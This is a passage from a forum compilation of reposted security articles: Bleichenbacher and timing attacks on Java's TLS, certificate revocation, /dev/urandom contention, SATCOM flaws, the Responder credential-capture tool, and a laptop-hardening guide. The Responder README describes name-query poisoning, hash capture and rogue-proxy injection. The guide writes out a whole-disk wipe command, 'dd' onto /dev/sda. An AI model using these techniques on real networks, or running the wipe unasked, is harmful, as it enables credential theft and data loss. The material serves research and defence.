If a 00 byte is contained in any of the red marked positions, the side channel will help us to recognize these ciphertexts. We tested our resurrected Bleichenbacher attack and were able to get the decrypted PreMasterSecret back. This took about 5h and 460000 queries to the target server for a 2048 bit key. Sounds like a lot? No problem... Using the newest, high-performance adaption of the attack (many thanks to Graham Steel for the very helpful discussions!) required only about 73710 queries on average for a 4096 bit RSA key! JSSE was successfully exploited a first time. But let's have a look at a much more complicated scenario. No obvious presence of a side channel at all... Maybe we can use the first case... Secret-Depending Processing Branches Lead to Timing Side Channels A conspicuous detail with respect to the random PreMasterSecret generation (you remember, the Bleichenbacher countermeasure) was already obvious during the code analysis of JSSE for the previous attack: The random PreMasterSecret was only generated if problems occurred during PKCS#1 decoding. Otherwise, no random bytes were generated (sun.security.ssl.Handshaker.calculateMasterSecret(...)). The question is, how time consuming is the generation of a random PreMasterSecret? Well, it depends and there is no definitive answer to this question. Measuring time for valid and invalid ciphertexts revealed blurred results. But at least, having different branches with different processing times introduces the chance for a timing side channel. This is why OpenSSL was independently patched during our research to guarantee equal processing times for both valid and invalid ciphertexts. Risks of Modern Software Design To make a long story short, it turned out that it was not the random number generation that caused the timing side channel, but the concept of creating and handling Exceptions. Throwing and catching Exceptions is a very expensive task with regard to the consumption of processing time. 
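The article targets Java, but the cost asymmetry between a plain return and a thrown-and-caught exception is easy to demonstrate in any exception-based language. A rough Python micro-benchmark (illustrative only - absolute numbers and ratios depend on the runtime; all names are my own):

```python
import timeit

def decode_ok(data):
    # "Valid padding": the common case, a plain return.
    return data

def decode_fail(data):
    # "Invalid padding": the error case, signalled via an exception.
    raise ValueError("bad padding")

def run(fn, n=100_000):
    # Time n calls of fn, catching the exception each time it is raised.
    def once():
        try:
            fn(b"x")
        except ValueError:
            pass
    return timeit.timeit(once, number=n)

t_ok = run(decode_ok)
t_fail = run(decode_fail)
print("plain return: %.3fs  raise/catch: %.3fs  ratio: %.1fx"
      % (t_ok, t_fail, t_fail / t_ok))
```

The raise/catch path is consistently the slower one, which is exactly the kind of branch-dependent cost a remote timing measurement can pick up.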
Unfortunately, the Java code responsible for PKCS#1 decoding (sun.security.rsa.RSAPadding.unpadV15(...)) was written with the best intentions from a developer's point of view. It throws Exceptions if errors occur during PKCS#1 decoding. Time measurements revealed significant differences in the response time of a server when confronted with valid/invalid PKCS#1 structures. These differences could even be measured in a live environment (university network) with a lot of traffic and noise on the line. Again, how is this useful? It's always the same - when knowing that the ciphertext reached the PKCS#1 decoding branch, you know it was recognized as PKCS#1 and thus represents a useful and valid side channel for Bleichenbacher's attack. The attack on an OpenJDK 1.6 powered server took about 19.5h and 18600 oracle queries in our live setup! JSSE was hit the second time... OAEP Comes To The Rescue Some of you might say "Switch to OAEP and all of your problems are gone....". I agree, partly. OAEP will indeed fix a lot of security problems (but definitely not all!), but only if implemented correctly. Manger told us that implementing OAEP the wrong way could have disastrous results. While looking at the OAEP decoding code in sun.security.rsa.RSAPadding it turned out that the code contained a behaviour similar to the one described by Manger as problematic. This could have led to another side channel if SSL/TLS already offered OAEP support... All the vulnerabilities mentioned in this post are fixed, but others are in line to follow... We submitted a research paper which will explain the vulnerabilities mentioned here in more depth, as well as the unpublished ones, so stay tuned - there's more to come. Many thanks to my fellow researchers Juraj Somorovsky, Sebastian Schinzel, Erik Tews, Eugen Weiss, Tibor Jager and Jörg Schwenk - all of our findings wouldn't have been possible without everyone's special contribution. 
It needs a skilled team to turn theoretical attacks into practice! A more detailed analysis of all vulnerabilities listed here, as well as a lot more on SSL/TLS security, can be found in my PhD thesis: 20 Years of SSL/TLS Research: An Analysis of the Internet's Security Foundation. Posted 3 days ago by Chris Meyer Sursa: Java Security and Related Topics: Easter Hack: Even More Critical Bugs in SSL/TLS Implementations
  17. [h=3]No, don't enable revocation checking (19 Apr 2014)[/h] Revocation checking is in the news again because of a large number of revocations resulting from precautionary rotations for servers affected by the OpenSSL heartbeat bug. However, revocation checking is a complex topic and there's a fair amount of misinformation around. In short, it doesn't work and you are no more secure by switching it on. But let's quickly catch up on the background: Certificates bind a public key and an identity (commonly a DNS name) together. Because of the way the incentives work out, they are typically issued for a period of several years. But events occur and sometimes the binding between public key and name that the certificate asserts becomes invalid during that time. In the recent cases, people who ran a server that was affected by the heartbeat bug are worried that their private key might have been obtained by someone else and so they want to invalidate the old binding, and bind to a new public key. However, the old certificates are still valid and so someone who had obtained that private key could still use them. Revocation is the process of invalidating a certificate before its expiry date. All certificates include a statement that essentially says “please phone the following number to check that this certificate has not been revoked”. The term online revocation checking refers to the process of making that phone call. It's not actually a phone call, of course, rather browsers and other clients can use a protocol called OCSP to check the status of a certificate. OCSP supplies a signed statement that says that the certificate is still valid (or not) and, critically, the OCSP statement itself is valid for a much shorter period of time, typically a few days. The critical question is what to do in the event that you can't get an answer about a certificate's revocation status. If you reject certificates when you can't get an answer, that's called hard-fail. 
If you accept certificates when you can't get an answer that's called soft-fail. Everyone does soft-fail for a number of reasons on top of the general principle that single points of failure should be avoided. Firstly, the Internet is a noisy place and sometimes you can't get through to OCSP servers for some reason. If you fail in those cases then the level of random errors increases. Also, captive portals (e.g. hotel WiFi networks where you have to “login” before you can use the Internet) frequently use HTTPS (and thus require certificates) but don't allow you to access OCSP servers. Lastly, if everyone did hard-fail then taking down an OCSP service would be sufficient to take down lots of Internet sites. That would mean that DDoS attackers would turn their attention to them, greatly increasing the costs of running them and it's unclear whether the CAs (who pay those costs) could afford it. (And the disruption is likely to be significant while they figure that out.) So soft-fail is the only viable answer but it has a problem: it's completely useless. But that's not immediately obvious so we have to consider a few cases: If you're worried about an attacker using a revoked certificate then the attacker first must be able to intercept your traffic to the site in question. (If they can't even intercept the traffic then you didn't need any authentication to protect it from them in the first place.) Most of the time, such an attacker is near you. For example, they might be running a fake WiFi access point, or maybe they're at an ISP. In these cases the important fact is that the attacker can intercept all your traffic, including OCSP traffic. Thus they can block OCSP lookups and soft-fail behaviour means that a revoked certificate will be accepted. The next class of attacker might be a state-level attacker. For example, Syria trying to intercept Facebook connections. 
These attackers might not be physically close, but they can still intercept all your traffic because they control the cables going into and out of a country. Thus, the same reasoning applies. We're left with cases where the attacker can only intercept traffic between a user and a website, but not between the user and the OCSP service. The attacker could be close to the website's servers and thus able to intercept all traffic to that site, but not anything else. More likely, the attacker might be able to perform a DNS hijacking: they persuade a DNS registrar to change the mapping between a domain (example.com) and its IP address(es) and thus direct the site's traffic to themselves. In these cases, soft-fail still doesn't work, although the reasoning is more complex: Firstly, the attacker can use OCSP stapling to include the OCSP response with the revoked certificate. Because OCSP responses are generally valid for some number of days, they can store one from before the certificate was revoked and use it for as long as it's valid for. DNS hijackings are generally noticed and corrected faster than the OCSP response will expire. (On top of that, you need to worry about browser cache poisoning, but I'm not going to get into that.) Secondly, and more fundamentally, when issuing certificates a CA validates ownership of a domain by sending an email, or looking for a specially formed page on the site. If the attacker is controlling the site, they can get new certificates issued. The original owners might revoke the certificates that they know about, but it doesn't matter because the attacker is using different ones. The true owners could try contacting CAs, convincing them that they are the true owners and get other certificates revoked, but if the attacker still has control of the site, they can hop from CA to CA getting certificates. (And they will have the full OCSP validity period to use after each revocation.) That circus could go on for weeks and weeks. 
That's why I claim that online revocation checking is useless - because it doesn't stop attacks. Turning it on does nothing but slow things down. You can tell when something is security theater because you need some absurdly specific situation in order for it to be useful. So, for a couple of years now, Chrome hasn't done these useless checks by default in most cases. Rather, we have tried a different mechanism. We compile daily lists of some high-value revocations and use Chrome's auto-update mechanism to push them to Chrome installations. It's called the CRLSet and it's not complete, nor big enough to cope with large numbers of revocations, but it allows us to react quickly to situations like Diginotar and ANSSI. It's certainly not perfect, but it's more than many other browsers do. A powerful attacker may be able to block a user from receiving CRLSet updates if they can intercept all of that user's traffic for long periods of time. But that's a pretty fundamental limit; we can only respond to any Chrome issue, including security bugs, by pushing updates. The original hope with CRLSets was that we could get revocations categorised into important and administrative and push only the important ones. (Administrative revocations occur when a certificate is changed with no reason to suspect that any key compromise occurred.) Sadly, that mostly hasn't happened. Perhaps we need to consider a system that can handle much larger numbers of revocations, but the data in that case is likely to be two orders of magnitude larger and it's very unlikely that the current CRLSet design is still optimal when the goal moves that far. It's also a lot of data for every user to be downloading and perhaps efforts would be better spent elsewhere. It's still the case that an attacker that can intercept traffic can easily perform an SSL Stripping attack on most sites; they hardly need to fight revoked certificates. 
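Chrome's real CRLSet format and update pipeline are more involved, but the core idea - a locally held, push-updated set of revocations consulted with no network round trip an attacker could block - can be sketched as follows (all names hypothetical):

```python
class CRLSet:
    """Toy sketch of a CRLSet-style local revocation check: the browser
    periodically receives a set of (issuer_spki_hash, serial) pairs via its
    normal update channel and consults it at connection time."""

    def __init__(self):
        self._revoked = set()

    def update(self, entries):
        """Apply a pushed update: an iterable of (issuer_spki_hash, serial)."""
        self._revoked.update(entries)

    def is_revoked(self, issuer_spki_hash: bytes, serial: int) -> bool:
        # Pure local lookup: no OCSP fetch an on-path attacker could block.
        return (issuer_spki_hash, serial) in self._revoked

crlset = CRLSet()
crlset.update([(b"\x01" * 32, 0x1234)])
print(crlset.is_revoked(b"\x01" * 32, 0x1234))  # True
print(crlset.is_revoked(b"\x02" * 32, 0x1234))  # False
```

The design trades completeness for availability: the check can never be blocked at connection time, but only the revocations that fit in the pushed set are covered.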
In order to end on a positive note, I'll mention a case where online revocation checking does work, and another, possible way to solve the revocation problem for browsers. The arguments above started with the point that an attacker using a revoked certificate first needs to be able to intercept traffic between the victim and the site. That's true for browsers, but it's not true for code-signing. In the case where you're checking the signature on a program or document that could be distributed via, say, email, then soft-fail is still valuable. That's because it increases the costs on the attacker substantially: they need to go from being able to email you to needing to be able to intercept OCSP checks. In these cases, online revocation checking makes sense. If we want a scalable solution to the revocation problem then it's probably going to come in the form of short-lived certificates or something like OCSP Must Staple. Recall that the original problem stems from the fact that certificates are valid for years. If they were only valid for days then revocation would take care of itself. (This is the approach taken by DNSSEC.) For complex reasons, it might be easier to deploy that by having certificates that are valid for years, but include a marker in them that indicates that an OCSP response must be provided along with the certificate. The OCSP response is then only valid for a few days and the effect is the same (although less efficient). Sursa: https://www.imperialviolet.org/2014/04/19/revchecking.html
  18. Linux /dev/urandom and concurrency Recently I was surprised to find out that a process that I expected to complete in about 8 hours was still running after 20. Everything appeared to be operating normally. The load on the server was what we expected, IO was minimal, and the external services it was using were responding with latencies that were normal. After tracing one of the sub-processes we noticed that reads from /dev/urandom were not what we expected. It was taking 80-200ms to read 4k from this device. At first I thought that this was an issue with entropy but /dev/urandom is non-blocking so that probably wasn't the issue. I didn't think that 80-200ms was typical so I tried a dd on the system in question and another similar system in production. The system in question took about 3 minutes to write 10Mb while the reference system took about 3s. The only difference between the systems with respect to /dev/urandom was the rate and number of processes reading from the device. The reads were on the order of hundreds per second. The number of processes reading from /dev/urandom made me wonder if maybe there was a spinlock in the kernel in the read code. After looking at the code I found one. You can see the spinlock here in the Linux kernel source code. The author mentions the potential for contention in a thread on the mailing list from December 2004. Fast forward 10 years and contention on this device is a real issue. Our application uses curl from within PHP to fetch data from a cache. The application has to process 10s of millions of text objects and we don't want to wait days for that processing to complete so we split the work of processing each object over N threads. The read from /dev/urandom appears to be coming from ares_init which is being called from curl_easy_init in our version of PHP+curl. Removing the AsynchDNS feature from curl causes the problem to go away (tracing confirms that the read from /dev/urandom is no longer there). 
You can remove this feature by compiling with --disable-ares. So why is this an issue? I wrote a python script to measure the read times from /dev/urandom as you increase the contention by adding more threads. Here is a plot with the results. Running the same script with a user-land file is more or less linear out to 16 threads. A simple spinlock can have a big impact in the multi-core world of 2014! Sursa: Linux /dev/urandom and concurrency
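The author's measurement script isn't included in the post; a minimal sketch of the same experiment - N threads each timing 4 KiB reads from /dev/urandom - could look like this (Linux only; function and parameter names are my own):

```python
import threading
import time

def read_loop(path, reads, results):
    # Each worker times `reads` sequential 4 KiB reads and records
    # the worst single-read latency it observed.
    worst = 0.0
    with open(path, "rb", buffering=0) as f:
        for _ in range(reads):
            t0 = time.perf_counter()
            f.read(4096)
            worst = max(worst, time.perf_counter() - t0)
    results.append(worst)

def measure(path="/dev/urandom", threads=4, reads=1000):
    results = []
    workers = [threading.Thread(target=read_loop, args=(path, reads, results))
               for _ in range(threads)]
    for w in workers:
        w.start()
    for w in workers:
        w.join()
    return max(results)  # worst 4 KiB read latency across all workers

if __name__ == "__main__":
    for n in (1, 2, 4, 8, 16):
        print("%2d threads: worst read %.3f ms" % (n, measure(threads=n) * 1e3))
```

Note that the kernel's random driver has been reworked several times since 2014, so the contention may be far less visible on current kernels.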
  19. [h=3]A Wake-up Call for SATCOM Security[/h] By Ruben Santamarta @reversemode During the last few months we have witnessed a series of events that will probably be seen as a tipping point in the public’s opinion about the importance of, and need for, security. The revelations of Edward Snowden have served to confirm some theories and shed light on surveillance technologies that were long restricted. We live in a world where an ever-increasing stream of digital data is flowing between continents. It is clear that those who control communications traffic have an upper-hand. Satellite Communications (SATCOM) plays a vital role in the global telecommunications system. Sectors that commonly rely on satellite networks include: Aerospace Maritime Military and governments Emergency services Industrial (oil rigs, gas, electricity) Media It is important to mention that certain international safety regulations for ships such as GMDSS or aircraft's ACARS rely on satellite communication links. In fact, we recently read how, thanks to the SATCOM equipment on board Malaysian Airlines MH370, Inmarsat engineers were able to determine the approximate position of where the plane crashed. IOActive is committed to improving overall security. The only way to do so is to analyze the security posture of the entire supply chain, from the silicon level to the upper layers of software. Thus, in the last quarter of 2013 I decided to research into a series of devices that, although widely deployed, had not received the attention they actually deserve. The goal was to provide an initial evaluation of the security posture of the most widely deployed Inmarsat and Iridium SATCOM terminals. In previous blog posts I've explained the common approach when researching complex devices that are not physically accessible. In these terms, this research is not much different than the previous research: in most cases the analysis was performed by reverse engineering the firmware statically. 
What about the results? Insecure and undocumented protocols, backdoors, hard-coded credentials...mainly design flaws that allow remote attackers to fully compromise the affected devices using multiple attack vectors. Ships, aircraft, military personnel, emergency services, media services, and industrial facilities (oil rigs, gas pipelines, water treatment plants, wind turbines, substations, etc.) could all be affected by these vulnerabilities. I hope this research is seen as a wake-up call for both the vendors and users of the current generation of SATCOM technology. We will be releasing full technical details in several months, at Las Vegas, so stay tuned. The following white paper comprehensively explains all the aspects of this research http://www.ioactive.com/pdfs/IOActive_SATCOM_Security_WhitePaper.pdf Sursa: IOActive Labs Research: A Wake-up Call for SATCOM Security
  20. NBT-NS/LLMNR Responder Laurent Gaffie lgaffie@trustwave.com http://www.spiderlabs.com INTRODUCTION This tool is first an LLMNR, NBT-NS and MDNS responder: it will answer specific NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409). By default, the tool will only answer File Server Service requests, which is for SMB. The concept behind this is to target our answers and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behavior. You can set the -r option to "On" via command line if you want this tool to answer the Workstation Service request name suffix as well. FEATURES Built-in SMB Auth server. Supports NTLMv1 and NTLMv2 hashes with Extended Security NTLMSSP by default. Successfully tested from Windows 95 to Server 2012 RC, Samba and Mac OSX Lion. Clear text passwords are supported for NT4, and LM hashing downgrade when the --lm option is set to On. This functionality is enabled by default when the tool is launched. Built-in MSSQL Auth server. In order to redirect SQL Authentication to this tool, you will need to set the option -r to On (NBT-NS queries for SQL Server lookup use the Workstation Service name suffix) for systems older than Windows Vista (LLMNR will be used for Vista and higher). This server supports NTLMv1 and LMv2 hashes. This functionality was successfully tested on Windows SQL Server 2005 & 2008. Built-in HTTP Auth server. In order to redirect HTTP Authentication to this tool, you will need to set the option -r to On for Windows versions older than Vista (NBT-NS queries for HTTP server lookup are sent using the Workstation Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMv1 and NTLMv2 hashes and Basic Authentication. This server was successfully tested on IE 6 to IE 10, Firefox, Chrome and Safari. Note: This module also works for WebDav NTLM authentication issued from Windows WebDav clients (WebClient). 
You can now send your custom files to a victim. Built-in HTTPS Auth server. In order to redirect HTTPS Authentication to this tool, you will need to set the -r option to On for Windows versions older than Vista (NBT-NS queries for HTTP server lookups are sent using the Workstation Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMv1, NTLMv2 and Basic Authentication. This server was successfully tested on IE 6 to IE 10, Firefox, Chrome and Safari. The folder Cert/ was added and contains 2 default keys, including a dummy private key. This is intentional; the purpose is to have Responder working out of the box. A script was added in case you need to generate your own self-signed key pair. Built-in LDAP Auth server. In order to redirect LDAP Authentication to this tool, you will need to set the option -r to On for Windows versions older than Vista (NBT-NS queries for HTTP server lookup are sent using the Workstation Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMSSP hashes and Simple Authentication (clear text authentication). This server was successfully tested with the Windows Support tool "ldp" and LdapAdmin. Built-in FTP Auth server. This module will collect FTP clear text credentials. Built-in small DNS server. This server will answer type A queries. This is really handy when it's combined with ARP spoofing. All hashes are printed to stdout and dumped in a unique, John-the-Ripper (Jumbo) compliant file, using this format: (SMB or MSSQL or HTTP)-(ntlm-v1 or v2 or clear-text)-Client_IP.txt The file will be located in the current folder. Responder will log all its activity to a file, Responder-Session.log. When the option -f is set to "On", Responder will fingerprint every host that issued an LLMNR/NBT-NS query. All capture modules still work while in fingerprint mode. Browser Listener finds the PDC in stealth mode. ICMP Redirect for MITM on Windows XP/2003 and earlier Domain members. 
This attack combined with the DNS module is pretty effective. WPAD rogue transparent proxy server. This module will capture all HTTP requests from anyone launching Internet Explorer on the network. This module is highly effective. You can now send your custom PAC script to a victim and inject HTML into the server's responses. See Responder.conf. This module is now enabled by default. Analyze mode: This module allows you to see NBT-NS, BROWSER and LLMNR requests from which workstation to which workstation without poisoning any requests. Also, you can map domains, MSSQL servers and workstations passively, and see if ICMP Redirect attacks are plausible on your subnet. Responder is now using a configuration file. See Responder.conf. Built-in POP3 auth server. This module will collect POP3 plain text credentials. Built-in SMTP auth server. This module will collect PLAIN/LOGIN clear text credentials. Download: https://github.com/SpiderLabs/Responder/
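The name-suffix matching described above operates on NetBIOS names as they appear on the wire, which use RFC 1001 "first-level" encoding: the name is space-padded to 15 bytes, a one-byte service suffix is appended, and each byte is split into two nibbles mapped onto the letters 'A'..'P'. A quick sketch:

```python
def netbios_encode(name: str, suffix: int = 0x00) -> str:
    """RFC 1001 'first-level' encoding of a NetBIOS name.

    The name is upper-cased and space-padded to 15 bytes, the one-byte
    service suffix is appended (0x00 = Workstation Service,
    0x20 = File Server Service), and every byte b becomes two letters:
    chr((b >> 4) + ord('A')) and chr((b & 0x0F) + ord('A')).
    """
    raw = name.upper().ljust(15).encode("ascii") + bytes([suffix])
    return "".join(chr((b >> 4) + 0x41) + chr((b & 0x0F) + 0x41) for b in raw)

print(netbios_encode("FRED"))  # 'EGFCEFEE' + 'CA' * 11 + 'AA'
```

The trailing two letters encode the suffix byte, which is what lets a responder answer only the service types it is interested in.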
  21. Paranoid security lockdown of laptop What I want to achieve is: Minimize damage done if the laptop is stolen Minimize damage done if the laptop is tampered with while away from it Minimize chance of being compromised while the system is running Maximize chance of detection if the system is compromised Maximize anonymity on the internet Security is a tradeoff between usability and risk. This document is for those willing to sacrifice some usability. I suspect the contents of this text will become increasingly valuable as time goes on. Full disk encryption Disk encryption ensures that files are always stored on disk in an encrypted form. The files only become available to the operating system and applications in readable form while the system is running and unlocked by a trusted user. An unauthorized person looking at the disk contents directly will only find garbled random-looking data instead of the actual files. For example, this can prevent unauthorized viewing of the data when the computer or hard disk is: located in a place to which non-trusted people might gain access while you're away lost or stolen, as with laptops, netbooks or external storage devices in the repair shop discarded after its end-of-life In addition, disk encryption can also be used to add some security against unauthorized attempts to tamper with your operating system - for example, the installation of keyloggers or Trojan horses by attackers who can gain physical access to the system while you're away. Preparation Fill the drive with random data to prevent recovery of previously stored data. It also prevents detection of usage patterns on the drive. 
dd if=/dev/urandom of=/dev/sda bs=1M Full disk encryption using dm-crypt + LUKS cryptsetup --cipher aes-xts-plain64 --key-size 512 --hash sha512 --iter-time 5000 --use-random --verify-passphrase luksFormat /dev/sda2 cryptsetup luksOpen /dev/sda2 root mkfs.ext4 /dev/mapper/root mount /dev/mapper/root /mnt mkdir /mnt/boot mount /dev/sda1 /mnt/boot Edit /etc/mkinitcpio.conf and add the encrypt and shutdown hooks to HOOKS. Place the encrypt hook directly before the filesystem hook. And add dm_mod and ext4 to MODULES. Edit /etc/default/grub and add GRUB_CMDLINE_LINUX="cryptdevice=/dev/sda2:root" Swap space No. Instead buy enough RAM. BIOS Set a BIOS password. This prevents cold boot attacks where RAM is immediately dumped after a reboot. It has been shown that data in RAM persists for a few seconds after powering down. USB attacks When a USB device is inserted, the USB driver in the kernel is invoked. If a bug is discovered here it may lead to code running: system("killall gnome-screensaver") Or it may slurp up all the memory and cause the Linux out-of-memory killer to kill the screensaver process. USB driver loading can be disabled in the BIOS. Or you can: echo 'install usb-storage : ' >> /etc/modprobe.d/usb-storage.conf USB automounting attacks You lesser beings willing to allow the USB driver to load should at least disable automounting. Allowing filesystems to automount causes even more potentially vulnerable code to run. E.g. Ubuntu once opened the file explorer and showed thumbnails of images. One researcher was able to find a bug in an image library used to produce thumbnails. He just inserted a USB drive and the exploit killed the screensaver. Screensaver Set a screensaver with password lock to kick in after one minute. Create a keyboard shortcut to lock the screen and manually lock when temporarily leaving the system. Power down for longer absences. File integrity To detect compromised files, file integrity tools can store hashsums of them and let you know if they suddenly change. 
Obviously, malware can also modify the hashsums. But it helps in cases where malware does not. For the extra cautious, you could store the file integrity hashsums offline or print them out. AIDE (Advanced Intrusion Detection Environment) aide -i mv /var/lib/aide/aide.db.new.gz /var/lib/aide/aide.db.gz aide -C rkhunter Rootkit Hunter additionally scans the system for rootkits. On a clean system, update the system properties: rkhunter --propupd rkhunter --check --rwo -sk There probably are a few false positives. Edit /etc/rkhunter.conf.local and add exceptions for them. Here is my crontab for these two programs: MAILTO=me@dvikan.no MAILFROM=me@dvikan.no 30 06 * * 1 /usr/bin/rkhunter --cronjob --rwo 35 06 * * 1 /usr/bin/aide -C Network VPN Use a trusted VPN to prevent your ISP from seeing your traffic. www.ipredator.se To prevent traffic from accidentally flowing via the real physical network interface, you should only allow outgoing traffic to be UDP on port 1194. Also for DNS and DHCP, ports 53, 67 and 68 outgoing must be allowed. Simple stateful firewall Drop everything in INPUT. Then allow already existing connections. Also allow all traffic to the loopback interface. iptables -P INPUT DROP iptables -P FORWARD DROP iptables -P OUTPUT ACCEPT iptables -A INPUT -i lo -j ACCEPT iptables -A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT iptables -A OUTPUT -o enp2s0 -p udp -m udp --dport 53 -j ACCEPT iptables -A OUTPUT -o enp2s0 -p udp -m udp --dport 1194 -j ACCEPT iptables -A OUTPUT -o tun0 -j ACCEPT iptables -A OUTPUT -o enp2s0 -p udp -m udp --dport 67:68 -j ACCEPT Save the rules into a file and have them loaded on boot: iptables-save > /etc/iptables/iptables.rules systemctl enable iptables If your VPN does not support IPv6, then drop all outgoing traffic on IPv6: ip6tables -P OUTPUT DROP And add ipv6.disable=1 to the kernel line to prevent loading of the IPv6 module. DNS Do not use your ISP's DNS server. Unless you want them to see the domains you are visiting. 
https://www.ipredator.se/page/services#service_dns Put this in /etc/resolv.conf nameserver 194.132.32.32 nameserver 46.246.46.246 Preserve DNS settings by adding the following to /etc/dhcpcd.conf nohook resolv.conf MAC address To randomize the MAC address and keep the vendor prefix: macchanger -e interface After boot, set a random MAC address. Here is an example systemd service which you put in /etc/systemd/system/macchanger@.service. [Unit] Description=Macchanger service for %I Documentation=man:macchanger(1) [Service] ExecStart=/usr/bin/macchanger -e %I Type=oneshot [Install] WantedBy=multi-user.target Then to enable it: systemctl enable macchanger@enp2s0 Firefox Sandbox Sandfox runs programs within sandboxes which limit the program's access to only the files you specify. Why run Firefox and other programs in a sandbox? In the Firefox example, there are many components running: Java, JavaScript, Flash, and third-party plugins. All of these can open vulnerabilities due to bugs and malicious code; under certain circumstances these components can run anything on your computer and can access, modify, and delete your files. It's nice to know that when such vulnerabilities are exploited, these components can only see and access a limited subset of your files. Create a sandbox with sandfox: sudo sandfox firefox Do not install Flash or Java. Disable WebRTC to prevent local IP discovery For registration forms use a pseudorandom identity and a throwaway email address. Make Firefox prefer cipher suites providing forward secrecy. Extensions noscript https everywhere Email Many SMTP and IMAP servers use TLS. Not all do. Email is decrypted at each node. End-to-end encryption makes email secure. The most widely used standard for encrypting files is the OpenPGP standard. GnuPG is a free implementation of it. 
A short usage summary is: gpg --gen-key # generate keypair gpg --detach-sign --armor file.txt # signature gpg -r 7A2B13CD --armor --sign --encrypt file.txt # signature and encryption TLS gotchas If not all HTTP content is served over TLS, an attacker could inject JavaScript code which extracts your password. Or simply sniff the session cookie before or after. The bridge between plaintext and TLS in HTTP is a weak point. The HTTP HSTS header mitigates this particular threat. If a cipher suite with perfect forward secrecy is not used, then an attacker can at a later point use the server's private key to decrypt historically captured traffic. Other stuff Do not allow other users to read your files chmod 700 $HOME Some people tend to use the recursive option (-R) indiscriminately which modifies all child folders and files, but this is not necessary, and may yield other undesirable results. The parent directory alone is sufficient for preventing unauthorized access to anything below the parent. Put tape over the webcam. Other decent resources Surveillance Self-Defense Written 2014-04-19 by dag Sursa: https://dvikan.no/paranoid-security-lockdown-of-laptop
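The AIDE workflow in the file-integrity section above (initialize a database, then periodically compare) can be approximated for a single directory tree; this is a toy stand-in to show the idea, not a replacement for AIDE (all names are my own):

```python
import hashlib
import os

def snapshot(root):
    """Map each file path under `root` to its SHA-256 hex digest."""
    sums = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as f:
                sums[path] = hashlib.sha256(f.read()).hexdigest()
    return sums

def compare(baseline, current):
    """Return paths that were added, removed, or modified since the baseline."""
    added = set(current) - set(baseline)
    removed = set(baseline) - set(current)
    changed = {p for p in set(baseline) & set(current)
               if baseline[p] != current[p]}
    return added, removed, changed
```

As the section notes, the baseline itself must be protected (stored offline or printed), since malware that can modify files can usually modify a locally stored baseline too.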
  22. [h=2]The Hacker Playbook: Practical Guide To Penetration Testing[/h] Download Sursa: Hacking Articles|Raj Chandel's Blog: The Hacker Playbook: Practical Guide To Penetration Testing